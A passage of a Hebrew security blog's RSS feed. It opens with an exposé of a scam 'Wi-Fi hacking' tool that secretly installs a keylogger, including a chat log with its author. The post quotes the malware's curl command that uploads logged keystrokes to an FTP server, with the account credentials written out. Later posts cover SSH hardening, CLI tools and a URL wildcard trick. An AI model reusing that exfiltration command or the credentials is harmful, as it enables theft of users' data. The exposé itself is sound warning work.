<p>המסכן צריך שיפצו אותו על ה&quot;זמן והמאמץ&quot;. אוי-אוי-אוי (ותזכרו שכל המאמץ שלו מסתכם בסקריפט הונאה בלבד – הוא אפילו לא טרח לכלול איזשהו כלי לפריצת/ניתוח רשת אלחוטית שזמין באופן חופשי&#8230;)</p>
<p dir="ltr">Iftach(2:40 PM):  now, about the tool – that’s a linux binary obviously (thought</p>
<p dir="ltr">it was a shell script at the beginning). Did you base it on something existing</p>
<p dir="ltr">or write yourself?</p>
<p dir="ltr">fadzilmahfodh(2:41 PM):  i wrote it by my self then scramble the code</p>
<p dir="ltr">Iftach(2:41 PM):  hence the activation i see…</p>
<p dir="ltr">fadzilmahfodh(2:42 PM):  i can afford to give ‘free lunch’ to everybody. Hope</p>
<p dir="ltr">you understand</p>
<p dir="ltr">Iftach(2:43 PM):  sure, i understand.</p>
<p dir="ltr">fadzilmahfodh(2:43 PM):  So you interested in the software?</p>
<p dir="ltr">Iftach(2:44 PM):  more from a research point of view – for an article I’m</p>
<p dir="ltr">writing</p>
<p dir="ltr">Iftach(2:44 PM):  so, the installer you use, I see that it contains some</p>
<p dir="ltr">additional code that is being compiled on the client.</p>
<p dir="ltr">fadzilmahfodh(2:45 PM):  Yes. The purpose is the code will be unique to user</p>
<p dir="ltr">hardware</p>
<p dir="ltr">Iftach(2:45 PM):  and I saw that there were some FTP connections made? Is that</p>
<p dir="ltr">to verify that the client is a registered one?</p>
<p dir="ltr">fadzilmahfodh(2:46 PM):  Well, that is another story…</p>
<p dir="ltr">Iftach(2:46 PM):  I’m listening</p>
<p dir="ltr">fadzilmahfodh(2:46 PM):  maybe some other time huh</p>
<p dir="ltr">Iftach(2:47 PM):  OK. Last question – do you get a lot of account passwords</p>
<p dir="ltr">through that keylogger that sends the data to your FTP?</p>
<p dir="ltr">fadzilmahfodh(2:47 PM):  sorry, no comment unless i am in court</p>
<p>בשלב הזה של &quot;הראיון&quot; שלנו, הבנתי שסיפור הכיסוי שלי הולך להיות יותר אמיתי ממה שחשבתי (ולהלן ה&quot;מאמר&quot; שאתם קוראים). אי אפשר להמציא שטויות כאלה, אז הייצי חייב לתעד את זה איכשהו&#8230;</p>
<p dir="ltr">Iftach(2:48 PM):  aha, and it’s part of the installer because? just to make sure</p>
<p dir="ltr">people can send the activation email correctly?</p>
<p dir="ltr">Iftach(2:48 PM):  Back to statistics, out of the average 500 ppl asking for</p>
<p dir="ltr">activation – how many passwords do you manage to grab?</p>
<p dir="ltr">fadzilmahfodh(2:49 PM):  well, the ftp is to confirm that software match with</p>
<p dir="ltr">data in server</p>
<p dir="ltr">fadzilmahfodh(2:49 PM):  if it does not match, it will fail to run</p>
<p dir="ltr">fadzilmahfodh(2:49 PM):  or i can just change the data/activation code in the</p>
<p dir="ltr">server</p>
<p dir="ltr">fadzilmahfodh(2:49 PM):  then everything will not run</p>
<p dir="ltr">Iftach(2:49 PM):  and how does that relate to the keylogging?</p>
<p dir="ltr">fadzilmahfodh(2:50 PM):  well, that i another story…</p>
<p dir="ltr">Iftach(2:51 PM):  I mean – the keylogger data is sent to that FTP. Is that part</p>
<p dir="ltr">of the verification or is this a separate process?</p>
<p dir="ltr">Iftach(2:51 PM):  So, on average, how many accounts you manage to get on that</p>
<p dir="ltr">FTP server per day?</p>
<p dir="ltr">fadzilmahfodh(2:51 PM):  well, you do not even support my website and how the</p>
<p dir="ltr">hell am i going to tell you</p>
<p dir="ltr">Iftach(2:52 PM):  Let’s just get it straight – I’m not going to “support” the</p>
<p dir="ltr">site… I’m just doing some research on security tools.</p>
<p dir="ltr">fadzilmahfodh(2:52 PM):  bye</p>
<p dir="ltr">Iftach(2:53 PM):  You are free to tell, or not if you don’t want to. But I’m</p>
<p dir="ltr">publishing the story as it is…</p>
<p dir="ltr">Iftach(2:53 PM):  With your acknowledgment that you use a keylogger to steal your</p>
<p dir="ltr">site visitor passwords. Unless you want to be quoted otherwise in the story…</p>
<p>ונאמן להבטחתי לפדזיל (או איך שלא קוראים לחכמולוג שלנו), אני מפרסם את ה&quot;ראיון&quot; שלנו ללא שינויים משמעותיים.</p>
<p>אבל רגע – יש עוד! עוד? כן כן! הדובדבן על הקצפת היה בשלב ששכנעתע את עצמי להציק לידידינו רק עוד פעם אחת, ולנסות להיכנס ל-FTP שאליו הוא שולח את כל רישומי ההקלדות של המשתמשים שלו. הרי שם המשתמש והסיסמא היו באחד הסקריפטים (כאמור – &quot;קימפול&quot; שלהם לבינרי לא כל כך עובד עלינו&#8230;)</p>
<p dir="ltr">curl -s -k –ftp-ssl -T /pentest/log.txt -u fadzilmahfodh:buaya ftp://ftp.drivehq.com/code$number.txt</p>
<p>ואז הגיע המסך שהשאיר לי חיוך שהספיק לכל הסופ&quot;ש:</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/07/ftpclosed.png"><img class="aligncenter size-medium wp-image-1551" src="http://guym.co.il/wp-content/uploads/2010/07/ftpclosed-300x104.png" alt="שרת ה-FTP של הבחור" width="300" height="104" /></a></p>
<p>כמו שאומרים priceless.</p>
<p>אבל אתם יודעים מה? זה הכל באשמתנו! אם היינו &quot;תורמים&quot; לבחור כמו שהוא בטח מתחנן לכל מי ששולח לו אימייל, אז אולי היה לו מספיק כסף כדי לשלם עבור החשבון FTP שלו ב-drivehq, והיה יכול לעשות עוד כסך מלגנוב כסף נוסף מכל מי שנפל בהונאה שלו וקיבל keylogger במתנה.</p>
<p>גדול מהחיים. אבל ברצינות – מוסר השכל קצר (אחרת גיא לא היה מפרסם את זה עכשיו כששנינו מרצים רציניים בטכניון <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />  ) גם כלי סקיוריטי, במיוחד ממקומות לא מוכרים, זכאים לבדיקה קצרה. אני אולי קצת אולד-פשן אבל אם אני לא רואה את קוד המקור היום, אני הולך לדייק בקטנות. תסתכלו, תנטרו (רשת, זכרון, דיסק), ותבדקו שוב. לפעמים זה אפילו משתלם&#8230;</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=iamit&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%259c%25d7%25a0%25d7%25a1%25d7%2595%25d7%25aa-%25d7%259c%25d7%25a8%25d7%259e%25d7%2595%25d7%25aa-%25d7%2594%25d7%2590%25d7%25a7%25d7%25a8%25d7%2599%25d7%259d-%25d7%2595%25d7%259c%25d7%25a6%25d7%2590%25d7%25aa-%25d7%2598%25d7%259e%25d7%2591%25d7%259c&crtId=148&dt=1283503587"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%90%D7%99%D7%9A+%D7%9C%D7%A0%D7%A1%D7%95%D7%AA+%D7%9C%D7%A8%D7%9E%D7%95%D7%AA+%D7%94%D7%90%D7%A7%D7%A8%D7%99%D7%9D+%D7%95%D7%9C%D7%A6%D7%90%D7%AA+%D7%98%D7%9E%D7%91%D7%9C+%E2%80%93+%D7%A4%D7%95%D7%A1%D7%98+%D7%90%D7%95%D7%A8%D7%97+%D7%A9%D7%9C+%D7%99%D7%A4%D7%AA%D7%97+%D7%A2%D7%9E%D7%99%D7%AA+http://bit.ly/caU6YL" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/%d7%9c%d7%a0%d7%a1%d7%95%d7%aa-%d7%9c%d7%a8%d7%9e%d7%95%d7%aa-%d7%94%d7%90%d7%a7%d7%a8%d7%99%d7%9d-%d7%95%d7%9c%d7%a6%d7%90%d7%aa-%d7%98%d7%9e%d7%91%d7%9c/feed/</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
		<item>
		<title>&#8235;איך למצוא את המבצעים הטובים של הוט?&#8236;</title>		<link>http://guym.co.il/hot-best-deal/?nucrss=1</link>
		<comments>http://guym.co.il/hot-best-deal/#comments</comments>
		<pubDate>Tue, 29 Jun 2010 05:31:09 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[DLP]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1538</guid>
		<description><![CDATA[&#8235;חבר שלי, נתי כהן צמח, שלח לי את זה:
לא בטוח אם זו חולשה או בכוונה, אבל זה מצחיק ממש.
רציתי למצוא תקנון מבצע מסויים. חיפוש קצר בגוגל הוביל אותי לעמוד הזה:
http://www.hot.net.il/REGULATIONS.aspx?FolderID=906
לא היה לי את המספר שלו. אז עוד חיפוש בגוגל והפעם:
https://encrypted.google.com/search?hl=en&#38;q=site:hot.net.il+%22%D7%9E%D7%A1%D7%A4%D7%A8+%D7%AA%D7%A7%D7%A0%D7%95%D7%9F%22
לא מצאתי אותו בדיוק אבל שמתי לב שמספר התקנון הוא בעצם תאריך הכתיבה שלו.
אז התחלתי לקרוא [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fhot-best-deal&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>חבר שלי, נתי כהן צמח, שלח לי את זה:</p>
<p>לא בטוח אם זו חולשה או בכוונה, אבל זה מצחיק ממש.</p>
<p>רציתי למצוא תקנון מבצע מסויים. חיפוש קצר בגוגל הוביל אותי לעמוד הזה:<br />
<a href="http://www.hot.net.il/REGULATIONS.aspx?FolderID=906" target="_blank">http://www.hot.net.il/REGULATIONS.aspx?FolderID=906</a></p>
<p>לא היה לי את המספר שלו. אז עוד חיפוש בגוגל והפעם:<br />
<a href="https://encrypted.google.com/search?hl=en&amp;q=site:hot.net.il+%22%D7%9E%D7%A1%D7%A4%D7%A8+%D7%AA%D7%A7%D7%A0%D7%95%D7%9F%22" target="_blank">https://encrypted.google.com/search?hl=en&amp;q=site:hot.net.il+%22%D7%9E%D7%A1%D7%A4%D7%A8+%D7%AA%D7%A7%D7%A0%D7%95%D7%9F%22</a></p>
<p>לא מצאתי אותו בדיוק אבל שמתי לב שמספר התקנון הוא בעצם תאריך הכתיבה שלו.<br />
אז התחלתי לקרוא קצת את העמוד הקודם, והבנתי איך מחפשים:<br />
<a href="http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&amp;Search=20100101" target="_blank">http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&amp;Search=20100101</a></p>
<p>אז למה בעצם לא לעשות את זה:<br />
<a href="http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&amp;Search=2%2a" target="_blank">http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&amp;Search=2%2a</a><br />
טוב, כי זה לא עובד&#8230;</p>
<p>אבל רגע, זה כן:<br />
<a href="http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&amp;Search=2???????" target="_blank">http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&amp;Search=2???????</a></p>
<p>ROFL</p>
<p>תודה נתי <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fhot-best-deal&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%90%D7%99%D7%9A+%D7%9C%D7%9E%D7%A6%D7%95%D7%90+%D7%90%D7%AA+%D7%94%D7%9E%D7%91%D7%A6%D7%A2%D7%99%D7%9D+%D7%94%D7%98%D7%95%D7%91%D7%99%D7%9D+%D7%A9%D7%9C+%D7%94%D7%95%D7%98%3F+http://bit.ly/cNfEGo" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/hot-best-deal/feed/</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
		<item>
		<title>&#8235;googlecl: גוגל ב-CLI&#8236;</title>		<link>http://guym.co.il/googlec/?nucrss=1</link>
		<comments>http://guym.co.il/googlec/#comments</comments>
		<pubDate>Sat, 19 Jun 2010 12:25:22 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[google]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1536</guid>
		<description><![CDATA[&#8235;אז אם אתם כבר משתמשים בשירותים של גוגל, למה לא לעשות את זה מה-CLI?
מה אפשר לעשות?

Blogger
$ google blogger  post --title "foo" "command line posting"


Calendar
$  google calendar add "Lunch with Jim at noon tomorrow"


Contacts
$  google contacts list name,email &#62; contacts.csv


Docs
$  google docs edit --title "Shopping list"


Picasa
$  google picasa create --album "Cat [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fgooglec&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אז אם אתם כבר משתמשים בשירותים של גוגל, למה לא לעשות את זה מה-CLI?</p>
<p>מה אפשר לעשות?</p>
<ul>
<li><strong>Blogger</strong></li>
<blockquote><p><tt dir="ltr">$ google blogger  post --title "foo" "command line posting"</tt></p></blockquote>
</ul>
<ul>
<li><strong>Calendar</strong></li>
<blockquote><p><tt dir="ltr">$  google calendar add "Lunch with Jim at noon tomorrow"</tt></p></blockquote>
</ul>
<ul>
<li><strong>Contacts</strong></li>
<blockquote><p><tt dir="ltr">$  google contacts list name,email &gt; contacts.csv</tt></p></blockquote>
</ul>
<ul>
<li><strong>Docs</strong></li>
<blockquote><p><tt dir="ltr">$  google docs edit --title "Shopping list"</tt></p></blockquote>
</ul>
<ul>
<li><strong>Picasa</strong></li>
<blockquote><p><tt dir="ltr">$  google picasa create --album "Cat Photos" ~/photos/cats/*.jpg</tt></p></blockquote>
</ul>
<ul>
<li><strong>Youtube</strong></li>
<blockquote><p><tt dir="ltr">$  google youtube post --category Education killer_robots.avi</tt></p></blockquote>
</ul>
<p>אם אתם בעניין, תצטרכו את <a href="http://code.google.com/p/gdata-python-client/" target="_blank">gdata-python-client library</a> ואת <a href="http://code.google.com/p/googlecl/" target="_blank">googlecl</a>.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fgooglec&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=googlecl%3A+%D7%92%D7%95%D7%92%D7%9C+%D7%91-CLI+http://bit.ly/9KpOuH" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/googlec/feed/</wfw:commentRss>
		<slash:comments>14</slash:comments>
		</item>
		<item>
		<title>&#8235;התקפות Brute Force נגד SSH&#8236;</title>		<link>http://guym.co.il/ssh-bruteforce-countermeasures/?nucrss=1</link>
		<comments>http://guym.co.il/ssh-bruteforce-countermeasures/#comments</comments>
		<pubDate>Sat, 19 Jun 2010 07:48:44 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[אבטחת מידע]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1533</guid>
		<description><![CDATA[&#8235;יש כרגע גל של התקפות כנגד שרתי SSH.
ההתקפות הן מסוג Brute Force והן מבוצעות בשיטה מבוזרת (הרבה מחשבים תוקפים שכל אחד מנסה סיסמה או כמה סיסמאות).
מה אמורים לעשות?
1. לשנות את הסיסמה לקשה ומסובכת מספיק תוך שמירת מדיניות החלפה וכן נעילה לאחר מספר שגיאות. לחילופין אפשר וכדאי לאפשר גישה רק באמצעות מפתח ולא באמצעות סיסמה. כמובן [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fssh-bruteforce-countermeasures&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>יש כרגע גל של התקפות כנגד שרתי SSH.</p>
<p>ההתקפות הן מסוג Brute Force והן מבוצעות בשיטה מבוזרת (הרבה מחשבים תוקפים שכל אחד מנסה סיסמה או כמה סיסמאות).</p>
<p>מה אמורים לעשות?</p>
<p>1. לשנות את הסיסמה לקשה ומסובכת מספיק תוך שמירת מדיניות החלפה וכן נעילה לאחר מספר שגיאות. לחילופין אפשר וכדאי לאפשר גישה רק באמצעות מפתח ולא באמצעות סיסמה. כמובן שכדאי לגבות את המפתח..</p>
<p>2. אם יש לכם גישה באמצעות מפתח ואתם לא זקוקים לגישה עם סיסמה, לשנות את sshd_config כך שיכיל:</p>
<p>PasswordAuthentication no וגם ChallengeResponseAuthentication no. שימו לב לעשות זאת רק אחרי שיש לכם אפשרות גישה עם מפתח אחרת תנעלו לעצמכם את הגישה לשרת ולא תוכל להיכנס אליו בדרכים שיגרתיות!</p>
<p><a href="http://www.debian-administration.org/articles/152" target="_blank">Passwordless logins to ssh.</a></p>
<p>3. אם אתם מנהלים את השרת רק ממקום יחיד &#8211; אולי כדאי לנעול גישה לפורט 22 רק מה-IP שלכם. (ניתן לביצוע רק אם יש לכם IP קבוע).</p>
<p>בהצלחה.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fssh-bruteforce-countermeasures&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%94%D7%AA%D7%A7%D7%A4%D7%95%D7%AA+Brute+Force+%D7%A0%D7%92%D7%93+SSH+http://bit.ly/afseTj" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/ssh-bruteforce-countermeasures/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>&#8235;למה לא יהיה לי iPhone 4?&#8236;</title>		<link>http://guym.co.il/iphone-4/?nucrss=1</link>
		<comments>http://guym.co.il/iphone-4/#comments</comments>
		<pubDate>Sun, 13 Jun 2010 06:36:47 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[iphone]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1530</guid>
		<description><![CDATA[&#8235;בגלל iTunes.
התוכנה הזאת פשוט בלתי אפשרית.
המחשב הקודם שהיה לי האייפון התחבר וקיבל דרייבר בעייתי כך שאייטונז לא זיהה אותו. אי אפשר לסנכרן אלא אם כן מתקינים ידנית כל פעם את הדרייבר.
המחשב הוחלף והיה לי שבוע של חוסר צרות, הכל עבר כמו שצריך.
עכשיו אייטונז לא מזהה שהאאוטלוק שלי הוא ברירת מחדל ונותן בגלל זה את ההודעה [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fiphone-4&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>בגלל iTunes.</p>
<p>התוכנה הזאת פשוט בלתי אפשרית.</p>
<p>המחשב הקודם שהיה לי האייפון התחבר וקיבל דרייבר בעייתי כך שאייטונז לא זיהה אותו. אי אפשר לסנכרן אלא אם כן מתקינים ידנית כל פעם את הדרייבר.</p>
<p>המחשב הוחלף והיה לי שבוע של חוסר צרות, הכל עבר כמו שצריך.</p>
<p>עכשיו אייטונז לא מזהה שהאאוטלוק שלי הוא ברירת מחדל ונותן בגלל זה את ההודעה האינפורמטיבית הבאה:</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/06/itunes.png"><img class="aligncenter size-full wp-image-1531" title="הודעת שגיאה ריקה ב-iTunes" src="http://guym.co.il/wp-content/uploads/2010/06/itunes.png" alt="iTunes empty error dialog" width="157" height="145" /></a>זהו. נמאס לי.</p>
<p>אני לא משוכנע שזאת האיכות המדהימה שסטיב ג'ובס רגיל לתת ללקוחות שלו ואני בטוח שיש כאלה שיאשימו את ה-WINDOWS, ה-OUTLOOK, כדור הארץ או כל דבר אחר.</p>
<p>העובדה היא שלי אין אלטרנטיבה שתפתור את הבעיה ולכן אני לא יכול להמשיך לעבוד עם המכשיר הזה עם כל האהבה שלי כלפיו.</p>
<p>הדבר היותר בעייתי בכל העניין הוא שאני שוקל טלפון עם אנדרוייד עליו. כן, עם כל האהבה שלי לגוגל.</p>
<p>מדהים לאן החיים מגלגלים אותנו.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fiphone-4&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%9C%D7%9E%D7%94+%D7%9C%D7%90+%D7%99%D7%94%D7%99%D7%94+%D7%9C%D7%99+iPhone+4%3F+http://bit.ly/cywusj" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/iphone-4/feed/</wfw:commentRss>
		<slash:comments>35</slash:comments>
		</item>
		<item>
		<title>&#8235;מה עושים לטוקבקיסטים תמוהים?&#8236;</title>		<link>http://guym.co.il/%d7%9e%d7%94-%d7%a2%d7%95%d7%a9%d7%99%d7%9d-%d7%9c%d7%98%d7%95%d7%a7%d7%91%d7%a7%d7%99%d7%a1%d7%98%d7%99%d7%9d-%d7%aa%d7%9e%d7%95%d7%94%d7%99%d7%9d/?nucrss=1</link>
		<comments>http://guym.co.il/%d7%9e%d7%94-%d7%a2%d7%95%d7%a9%d7%99%d7%9d-%d7%9c%d7%98%d7%95%d7%a7%d7%91%d7%a7%d7%99%d7%a1%d7%98%d7%99%d7%9d-%d7%aa%d7%9e%d7%95%d7%94%d7%99%d7%9d/#comments</comments>
		<pubDate>Fri, 11 Jun 2010 04:45:57 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1527</guid>
		<description><![CDATA[&#8235;אחד העובדים של גוגל התעצבן על RSnake שכתב על GOOGLE דברים לא מאוד נחמדים (בצדק?) על פרסום מוקדם מדי של הבאג שנמצא לאחרונה במערכות העזרה של מיקרוסופט.
הבחור הגיע לבלוג של RSnake וכתב הודעה &#34;תמימה&#34; בו הוא תמה למה RSnake אומר שגוגל עושה דברים לא ישרים מאחורי הגב שלנו.
התגובה של RSnake היתה להסביר שגם לבוא מתוך [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%259e%25d7%2594-%25d7%25a2%25d7%2595%25d7%25a9%25d7%2599%25d7%259d-%25d7%259c%25d7%2598%25d7%2595%25d7%25a7%25d7%2591%25d7%25a7%25d7%2599%25d7%25a1%25d7%2598%25d7%2599%25d7%259d-%25d7%25aa%25d7%259e%25d7%2595%25d7%2594%25d7%2599%25d7%259d&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אחד העובדים של גוגל התעצבן על RSnake שכתב על GOOGLE דברים לא מאוד נחמדים (בצדק?) על פרסום מוקדם מדי של הבאג שנמצא לאחרונה במערכות העזרה של מיקרוסופט.<br />
הבחור הגיע לבלוג של RSnake וכתב הודעה &quot;תמימה&quot; בו הוא תמה למה RSnake אומר שגוגל עושה דברים לא ישרים מאחורי הגב שלנו.<br />
התגובה של RSnake היתה להסביר שגם לבוא מתוך IP של עובד גוגל ולתמוהה על דברים כאלה בלי להזדהות שאתה עובד בגוגל זה דבר בעייתי.<br />
צילום:<br />
<a href="http://guym.co.il/wp-content/uploads/2010/06/google-dude-and-rsnake.png"><br />
</a><a href="http://guym.co.il/wp-content/uploads/2010/06/google-dude-and-rsnake.png"><img class="aligncenter size-full wp-image-1528" title="טוקבקיסט של גוגל נחשף" src="http://guym.co.il/wp-content/uploads/2010/06/google-dude-and-rsnake.png" alt="" width="450" height="635" /></a></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%259e%25d7%2594-%25d7%25a2%25d7%2595%25d7%25a9%25d7%2599%25d7%259d-%25d7%259c%25d7%2598%25d7%2595%25d7%25a7%25d7%2591%25d7%25a7%25d7%2599%25d7%25a1%25d7%2598%25d7%2599%25d7%259d-%25d7%25aa%25d7%259e%25d7%2595%25d7%2594%25d7%2599%25d7%259d&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%9E%D7%94+%D7%A2%D7%95%D7%A9%D7%99%D7%9D+%D7%9C%D7%98%D7%95%D7%A7%D7%91%D7%A7%D7%99%D7%A1%D7%98%D7%99%D7%9D+%D7%AA%D7%9E%D7%95%D7%94%D7%99%D7%9D%3F+http://bit.ly/d7kdkQ" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/%d7%9e%d7%94-%d7%a2%d7%95%d7%a9%d7%99%d7%9d-%d7%9c%d7%98%d7%95%d7%a7%d7%91%d7%a7%d7%99%d7%a1%d7%98%d7%99%d7%9d-%d7%aa%d7%9e%d7%95%d7%94%d7%99%d7%9d/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>&#8235;איך גוגל עובד?&#8236;</title>		<link>http://guym.co.il/%d7%90%d7%99%d7%9a-%d7%92%d7%95%d7%92%d7%9c-%d7%a2%d7%95%d7%91%d7%93/?nucrss=1</link>
		<comments>http://guym.co.il/%d7%90%d7%99%d7%9a-%d7%92%d7%95%d7%92%d7%9c-%d7%a2%d7%95%d7%91%d7%93/#comments</comments>
		<pubDate>Thu, 10 Jun 2010 06:08:24 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[google]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1525</guid>
		<description><![CDATA[&#8235;פה ההסבר:

<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%2590%25d7%2599%25d7%259a-%25d7%2592%25d7%2595%25d7%2592%25d7%259c-%25d7%25a2%25d7%2595%25d7%2591%25d7%2593&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>פה ההסבר:<br />
<object width="640" height="385"><param name="movie" value="http://www.youtube.com/v/BNHR6IQJGZs&#038;color1=0xb1b1b1&#038;color2=0xd0d0d0&#038;hl=en_US&#038;feature=player_embedded&#038;fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowScriptAccess" value="always"></param><embed src="http://www.youtube.com/v/BNHR6IQJGZs&#038;color1=0xb1b1b1&#038;color2=0xd0d0d0&#038;hl=en_US&#038;feature=player_embedded&#038;fs=1" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="640" height="385"></embed></object></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%2590%25d7%2599%25d7%259a-%25d7%2592%25d7%2595%25d7%2592%25d7%259c-%25d7%25a2%25d7%2595%25d7%2591%25d7%2593&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%90%D7%99%D7%9A+%D7%92%D7%95%D7%92%D7%9C+%D7%A2%D7%95%D7%91%D7%93%3F+http://bit.ly/abaq5E" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/%d7%90%d7%99%d7%9a-%d7%92%d7%95%d7%92%d7%9c-%d7%a2%d7%95%d7%91%d7%93/feed/</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
		<item>
		<title>&#8235;מזמן לא היה לי טרול&#8236;</title>		<link>http://guym.co.il/trol-turki/?nucrss=1</link>
		<comments>http://guym.co.il/trol-turki/#comments</comments>
		<pubDate>Mon, 07 Jun 2010 14:39:32 +0000</pubDate>
